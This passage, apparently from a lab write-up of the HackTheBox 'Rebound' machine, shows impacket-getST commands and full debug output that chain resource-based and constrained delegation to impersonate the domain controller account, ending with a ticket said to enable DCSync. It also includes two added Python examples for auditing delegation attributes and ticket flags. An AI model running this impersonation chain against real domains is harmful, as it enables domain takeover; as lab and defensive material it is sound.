Kerberos Constrained Delegation Attack
I have previously performed the RBCD attack to append the SID of the `ldap_monitor` account to the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of the `delegator$` account with the `browser/dc01.rebound.htb` SPN. Now, the `ldap_monitor` account is able to impersonate other users on `delegator$` via S4U2Proxy.
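To audit which principals an account's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute actually authorises, a defender has to decode the attribute value: it is a self-relative NT security descriptor whose DACL lists the trustee SIDs. The following Python is an added example, not code from this write-up or from Impacket. It builds a constructed sample descriptor for a constructed SID (the full-control mask `0x000F01FF` is part of the constructed sample) and then parses it back using the MS-DTYP struct layouts. Reading the attribute from LDAP is assumed to happen elsewhere; only the byte-level parsing is shown, and all function names are chosen here.

```python
import struct

# MS-DTYP layouts (little-endian):
#   SECURITY_DESCRIPTOR_RELATIVE: Revision(1) Sbz1(1) Control(2) OffsetOwner(4)
#                                 OffsetGroup(4) OffsetSacl(4) OffsetDacl(4)
#   ACL:  AclRevision(1) Sbz1(1) AclSize(2) AceCount(2) Sbz2(2)
#   ACE:  AceType(1) AceFlags(1) AceSize(2) Mask(4) Sid(variable)
#   SID:  Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian) SubAuthority(4 each)
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00


def sid_to_bytes(sid: str) -> bytes:
    """Encode an 'S-1-5-21-...' string as a binary SID."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, offset: int) -> tuple[str, int]:
    """Decode the binary SID at buf[offset:]; return (sid string, encoded length)."""
    revision, count = buf[offset], buf[offset + 1]
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    text = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * count


def make_sample_descriptor(sids: list[str]) -> bytes:
    """Constructed sample: a self-relative SD with one ACCESS_ALLOWED ACE per SID (test input only)."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), 0x000F01FF) + sid_b
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def allowed_to_act_sids(sd: bytes) -> list[tuple[str, int]]:
    """Return (trustee SID, access mask) for every ACCESS_ALLOWED ACE in the descriptor's DACL.

    For msDS-AllowedToActOnBehalfOfOtherIdentity these are the principals permitted to
    delegate (RBCD) to the account that carries the attribute.
    """
    _rev, _sbz1, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []  # no DACL: nobody is allowed to act on behalf of other identities
    _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos = dacl_off + 8
    trustees = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(sd, pos + 8)
            trustees.append((sid, mask))
        pos += ace_size  # AceSize covers header + SID, so this skips any ACE type correctly
    return trustees


if __name__ == "__main__":
    # Constructed SID; not a value from the write-up.
    sample = make_sample_descriptor(["S-1-5-21-1111-2222-3333-1105"])
    for sid, mask in allowed_to_act_sids(sample):
        print("allowed to act: %s (mask 0x%08X)" % (sid, mask))
```

In a real audit the raw bytes come from the LDAP attribute and each trustee SID is resolved back to an account; any unexpected SID on a computer account (especially one holding a sensitive SPN) is the finding.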
full s4u2 (self + proxy)
```text
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=ldap_monitor@dc01.rebound.htb.ccache impacket-getST rebound.htb/ldap_monitor@dc01.rebound.htb -k -no-pass -spn 'browser/dc01.rebound.htb' -impersonate 'dc01$' -dc-ip $IP -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[+] Using Kerberos Cache: ldap_monitor@dc01.rebound.htb.ccache
[+] Returning cached credential for KRBTGT/REBOUND.HTB@REBOUND.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: ldap_monitor
[*] Impersonating dc01$
[+] AUTHENTICATOR
Authenticator:
 authenticator-vno=5
 crealm=REBOUND.HTB
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   ldap_monitor
 cusec=646001
 ctime=20230914142543Z
[+] S4UByteArray
0000   01 00 00 00 64 63 30 31  24 72 65 62 6F 75 6E 64   ....dc01$rebound
0010   2E 68 74 62 4B 65 72 62  65 72 6F 73               .htbKerberos
[+] CheckSum
0000   FA 8F 16 B3 41 11 9E 15  53 F7 2F 21 F2 2D 90 44   ....A...S./!.-.D
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
 userName=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   dc01$
 userRealm=rebound.htb
 cksum=Checksum:
  cksumtype=-138
  checksum=0xfa8f16b341119e1553f72f21f22d9044
 auth-package=Kerberos
[+] Final TGS
TGS_REQ:
 pvno=5
 msg-type=12
 padata=SequenceOf:
  PA_DATA:
   padata-type=1
   padata-value=…
  PA_DATA:
   padata-type=129
   padata-value=0x304da0123010a003020101a10930071b056463303124a10d1b0b7265626f756e642e687462a21c301aa0040202ff76a1120410fa8f16b341119e1553f72f21f22d9044a30a1b084b65726265726f73
 req-body=KDC_REQ_BODY:
  kdc-options=1082195968
  realm=REBOUND.HTB
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    ldap_monitor
  till=20230915142543Z
  nonce=1599889139
  etype=SequenceOf:
   18 23
[*] Requesting S4U2self
[+] Trying to connect to KDC at 10.10.11.231:88
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=rebound.htb
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   dc01$
 ticket=Ticket:
  tkt-vno=5
  realm=REBOUND.HTB
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    ldap_monitor
  enc-part=EncryptedData:
   etype=23
   kvno=2
   cipher=…
 enc-part=EncryptedData:
  etype=18
  cipher=…
[*] Requesting S4U2Proxy
[+] Trying to connect to KDC at 10.10.11.231:88
[*] Saving ticket in dc01$.ccache
```
Impersonating the `dc01$` account from the `ldap_monitor` account leverages the delegation previously set in the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of the `delegator$` account, which holds the `browser/dc01.rebound.htb` SPN.

Now, this generates a forwardable service ticket that is sufficient in most cases, but an additional step is required to finally access the `http/dc01.rebound.htb` SPN.
Ease of Identification
For ease of identification, I will rename the `dc01$.ccache` file to `dc01$.ldap_monitor.ccache`.
additional s4u2proxy
```text
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=delegator\$@dc01.rebound.htb.ccache impacket-getST 'rebound.htb/delegator$@rebound.htb' -k -no-pass -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket dc01\$.ldap_monitor.ccache -dc-ip $IP -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[+] Using Kerberos Cache: delegator$@dc01.rebound.htb.ccache
[+] Returning cached credential for KRBTGT/REBOUND.HTB@REBOUND.HTB
[+] Using TGT from cache
[+] Username retrieved from CCache: delegator$
[*] Impersonating dc01$
[*] Using additional ticket dc01$.ldap_monitor.ccache instead of S4U2Self
[+] Returning cached credential for BROWSER/DC01.REBOUND.HTB@REBOUND.HTB
[+] Changing sname from browser/dc01.rebound.htb@REBOUND.HTB to b'browser/dc01.rebound.htb@REBOUND.HTB' and hoping for the best
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=REBOUND.HTB
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   dc01$
 ticket=Ticket:
  tkt-vno=5
  realm=REBOUND.HTB
  sname=PrincipalName:
   name-type=2
   name-string=SequenceOf:
    browser dc01.rebound.htb
  enc-part=EncryptedData:
   etype=18
   kvno=1
   cipher=…
 enc-part=EncryptedData:
  etype=1
  cipher=
[*] Requesting S4U2Proxy
[+] Trying to connect to KDC at 10.10.11.231:88
[*] Saving ticket in dc01$.ccache
```
The `delegator$` account requests a TGS ticket for the `http/dc01.rebound.htb` SPN while impersonating the `dc01$` account.

Additionally, the `-additional-ticket` flag was supplied to leverage the forwardable service ticket in an S4U2Proxy request for RBCD + KCD [without Protocol Transition](https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained#without-protocol-transition) (see also [[Rebound_Delegation]]).
dc01$.ccache
```text
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ python3 describeTicket.py ./dc01$.ccache
Impacket v0.11.0 - Copyright 2023 Fortra

[*] number of credentials in cache: 1
[*] parsing credential[0]:
[*]   user name                 : dc01$
[*]   user realm                : rebound.htb
[*]   service name              : http/dc01.rebound.htb
[*]   service realm             : REBOUND.HTB
[*]   start time                : 14/09/2023 16:26:32 PM
[*]   end time                  : 15/09/2023 00:11:38 AM
[*]   renewtill                 : 15/09/2023 14:08:43 PM
[*]   flags                     : (0x40a50000) forwardable, renewable, pre_authent, ok_as_delegate, enc_pa_rep
[*]   keytype                   : rc4_hmac
[*]   base64(key)               : o7+g+mWXZhZMhBQN80c18A==
[*]   kerberoast hash           : $krb5tgs$18$USER$REBOUND.HTB$*http/dc01.rebound.htb*$0573631a33f6f955f0487c23$…
[*] decoding unencrypted data in credential[0]['ticket']:
[*]   service name              : http/dc01.rebound.htb
[*]   service realm             : REBOUND.HTB
[*]   encryption type           : aes256_cts_hmac_sha1_96 (etype 18)
[*]   key version number (kvno) : 4
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
```
The result is the valid TGT, `dc01$.ccache`, of the `dc01$` account with the `ok_as_delegate` flag set, which can be abused to perform DCSync against the target domain.
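The `flags` field that `describeTicket.py` prints is the raw 32-bit ticket-flags integer stored in the ccache; the names beside it are decoded from that integer. The following Python is an added example, not code from this write-up or from Impacket. It decodes the integer using the RFC 4120 bit numbering (bit 0 is the most significant bit of the field), cross-checks the printed names against the value, and lists the properties of a ticket that matter when a defender reviews a recovered credential cache for delegation abuse. The sample line is copied from the output above; `parse_flags_line` and `delegation_notes` are names chosen here.

```python
import re

# RFC 4120 section 5.4.1 ticket-flag bit positions (bit 0 = most significant bit),
# plus enc-pa-rep (RFC 6806) and anonymous (RFC 6112). In the ccache the field is a
# 32-bit integer, so flag bit n corresponds to the value 1 << (31 - n).
TICKET_FLAG_BITS = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre_authent", 11: "hw_authent",
    12: "transited_policy_checked", 13: "ok_as_delegate",
    15: "enc_pa_rep", 16: "anonymous",
}

# Matches the describeTicket-style line "flags : (0x40a50000) forwardable, renewable, ..."
FLAGS_LINE = re.compile(r"flags\s*:\s*\((0x[0-9a-fA-F]+)\)\s*(.*)")


def decode_ticket_flags(value: int) -> list[str]:
    """Return the names of the ticket flags set in a ccache flags integer, in bit order."""
    return [name for bit, name in sorted(TICKET_FLAG_BITS.items())
            if value & (1 << (31 - bit))]


def parse_flags_line(line: str) -> tuple[int, list[str]]:
    """Extract the hex value and the printed flag names from a 'flags' output line."""
    match = FLAGS_LINE.search(line)
    if not match:
        raise ValueError("line carries no flags field")
    value = int(match.group(1), 16)
    printed = [name.strip() for name in match.group(2).split(",") if name.strip()]
    return value, printed


def delegation_notes(value: int, service: str) -> list[str]:
    """Triage notes for a reviewer: which flags make this ticket relevant to delegation."""
    flags = decode_ticket_flags(value)
    notes = []
    is_tgt = service.lower().startswith("krbtgt/")
    if "forwardable" in flags and not is_tgt:
        # A forwardable service ticket is exactly what S4U2Proxy accepts as the evidence
        # ticket, so its presence in an unexpected cache deserves a closer look.
        notes.append("forwardable service ticket: usable as the evidence ticket in S4U2Proxy")
    if "ok_as_delegate" in flags:
        # The KDC sets ok-as-delegate when the target service account is trusted for delegation.
        notes.append("ok_as_delegate: target service account is trusted for delegation")
    return notes


if __name__ == "__main__":
    # Sample line copied from the describeTicket output in the write-up above.
    sample = "[*]   flags : (0x40a50000) forwardable, renewable, pre_authent, ok_as_delegate, enc_pa_rep"
    value, printed = parse_flags_line(sample)
    decoded = decode_ticket_flags(value)
    print("decoded:", decoded)
    print("matches printed names:", decoded == printed)
    for note in delegation_notes(value, "http/dc01.rebound.htb"):
        print("-", note)
```

Checking the decoded names against the printed ones is a cheap sanity test when a cache has been produced or post-processed by several tools, and the same decoder works on the `flags` integer of any credential read directly from a ccache file.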